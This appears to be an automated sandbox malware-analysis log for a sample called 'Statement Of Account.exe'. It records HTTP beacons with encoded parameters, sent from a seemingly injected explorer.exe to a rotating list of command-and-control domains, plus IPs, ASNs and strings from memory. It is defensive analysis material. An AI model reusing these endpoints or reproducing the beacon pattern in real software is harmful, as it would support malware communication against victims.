          Source: global trafficHTTP traffic detected: GET /gs12/?r6-=DR9+51rACou4eQBXOdoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpwURv63eY6pg&YN=9rKtZn5 HTTP/1.1Host: www.airzf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gs12/?r6-=QIIWKxrtyX7LT6NTTkxUIHQxUymhf5FB+GXjykqQ4dPV8mdQoaOANT6/8pJ3wvHey5SR&YN=9rKtZn5 HTTP/1.1Host: www.b-a-s-e.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gs12/?r6-=993VfXh0jqtko3ENU03aV9e2gnwjzkI9tuLx/ah8zkvGCI6r8A517lqbkaAk6P8eMjr8&YN=9rKtZn5 HTTP/1.1Host: www.zdryueva.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
          Source: Joe Sandbox ViewIP Address: 34.149.87.45 34.149.87.45
          Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
          Source: Joe Sandbox ViewASN Name: UNMETEREDCA UNMETEREDCA
          Source: Joe Sandbox ViewASN Name: ATGS-MMD-ASUS ATGS-MMD-ASUS
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\explorer.exeCode function: 9_2_0F904F82 getaddrinfo,setsockopt,recv,9_2_0F904F82
          Source: global trafficHTTP traffic detected: GET /gs12/?r6-=DR9+51rACou4eQBXOdoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpwURv63eY6pg&YN=9rKtZn5 HTTP/1.1Host: www.airzf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gs12/?r6-=QIIWKxrtyX7LT6NTTkxUIHQxUymhf5FB+GXjykqQ4dPV8mdQoaOANT6/8pJ3wvHey5SR&YN=9rKtZn5 HTTP/1.1Host: www.b-a-s-e.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gs12/?r6-=993VfXh0jqtko3ENU03aV9e2gnwjzkI9tuLx/ah8zkvGCI6r8A517lqbkaAk6P8eMjr8&YN=9rKtZn5 HTTP/1.1Host: www.zdryueva.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.airzf.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8X-Wix-Request-Id: 1713890667.07612762899732525067Age: 0Server: PepyakaX-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Tue, 23 Apr 2024 16:44:27 GMTX-Served-By: cache-chi-kigq8000037-CHIX-Cache: MISSVary: Accept-EncodingServer-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_42_gX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLkqHFWhjPEXyPTSLtPMFnp4a0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRalmBQ2QY4hzEJNVep8btjXtN21kVvhi4WWi737JqnyfsKzRUqbJQEwoR5t7fXMpcLTA==,2UNV7KOq4oGjA5+PKsX47P9efI/myzj/9e1V5kpi0zpYgeUJqUXtid+86vZww+nL,9DY27ey9PtG1M7AzVTPSAeIGguIVY9cIsA/DsRO7DrY=,g2aKszYfRloBamvU9+FSKbaI/koc3kS7zllmkFk7bZc=,0gGrL7iazMoiuqlb7dEO3Xp6cxvAmf0V9RlaNBeq9FVSB88D0lWBQzqUldF0H79KCJgk4i4ryDgNOsmaMtz63A==Transfer-Encoding: chunkedVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: closeData Raw: 62 66 32 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 Data Ascii: bf2 <!-- --><!doctype html><!-- --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'pag
          Source: explorer.exe, 00000009.00000000.1714988461.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1721919184.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000009.00000000.1714988461.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1721919184.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000009.00000000.1714988461.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1721919184.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000009.00000000.1714988461.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1721919184.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000009.00000000.1714988461.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000009.00000000.1723152883.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
          Source: explorer.exe, 00000009.00000002.2947771554.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1723152883.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
          Source: explorer.exe, 00000009.00000002.2945097297.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.2948147154.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.1719884903.0000000007F40000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: Statement Of Account.exe, 00000000.00000002.1703144585.0000000003150000.00000004.00000800.00020000.00000000.sdmp, SdYCcXyq.exe, 0000000B.00000002.1741610690.0000000002CBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.airzf.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.airzf.com/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.airzf.com/gs12/www.b-a-s-e.net
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.airzf.comReferer:
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.b-a-s-e.net
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.b-a-s-e.net/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.b-a-s-e.net/gs12/www.zdryueva.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.b-a-s-e.netReferer:
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.baansbliss.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.baansbliss.com/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.baansbliss.com/gs12/www.otirugkyt.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.baansbliss.comReferer:
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bodution.website
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bodution.website/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bodution.website/gs12/www.juniavilela.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bodution.websiteReferer:
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.demandstudiosnews.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.demandstudiosnews.com/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.demandstudiosnews.com/gs12/www.heavydutywearpart.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.demandstudiosnews.comReferer:
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.goldenvistaservices.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.goldenvistaservices.com/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.goldenvistaservices.comReferer:
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.heavydutywearpart.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.heavydutywearpart.com/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.heavydutywearpart.com/gs12/www.goldenvistaservices.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.heavydutywearpart.comReferer:
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hjgd.xyz
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hjgd.xyz/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hjgd.xyz/gs12/www.bodution.website
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hjgd.xyzReferer:
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.juniavilela.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.juniavilela.com/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.juniavilela.com/gs12/www.lolabeautystudios.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.juniavilela.comReferer:
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kustomequipment.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kustomequipment.com/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kustomequipment.com/gs12/www.novistashop.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kustomequipment.comReferer:
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lolabeautystudios.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lolabeautystudios.com/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lolabeautystudios.com/gs12/www.kustomequipment.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lolabeautystudios.comReferer:
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nexelab.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nexelab.com/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nexelab.com/gs12/www.udin88b.us
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nexelab.comReferer:
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.novistashop.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.novistashop.com/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.novistashop.com/gs12/www.nexelab.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.novistashop.comReferer:
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.otirugkyt.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.otirugkyt.com/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.otirugkyt.com/gs12/www.demandstudiosnews.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.otirugkyt.comReferer:
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.udin88b.us
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.udin88b.us/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.udin88b.us/gs12/www.baansbliss.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.udin88b.usReferer:
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zdryueva.com
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zdryueva.com/gs12/
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zdryueva.com/gs12/www.hjgd.xyz
          Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zdryueva.comReferer:
          Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000009.00000002.2951588982.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000009.00000000.1714988461.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
          Source: explorer.exe, 00000009.00000000.1714988461.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
          Source: explorer.exe, 00000009.00000002.2951588982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000009.00000000.1721919184.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000009.00000000.1721919184.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
          Source: explorer.exe, 00000009.00000000.1710227267.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1704959989.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2940190226.000000000370D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2937710239.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000009.00000000.1721919184.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
          Source: explorer.exe, 00000009.00000000.1721919184.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000009.00000000.1721919184.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
          Source: explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
          Source: explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000009.00000000.1714988461.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
          Source: explorer.exe, 00000009.00000000.1714988461.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
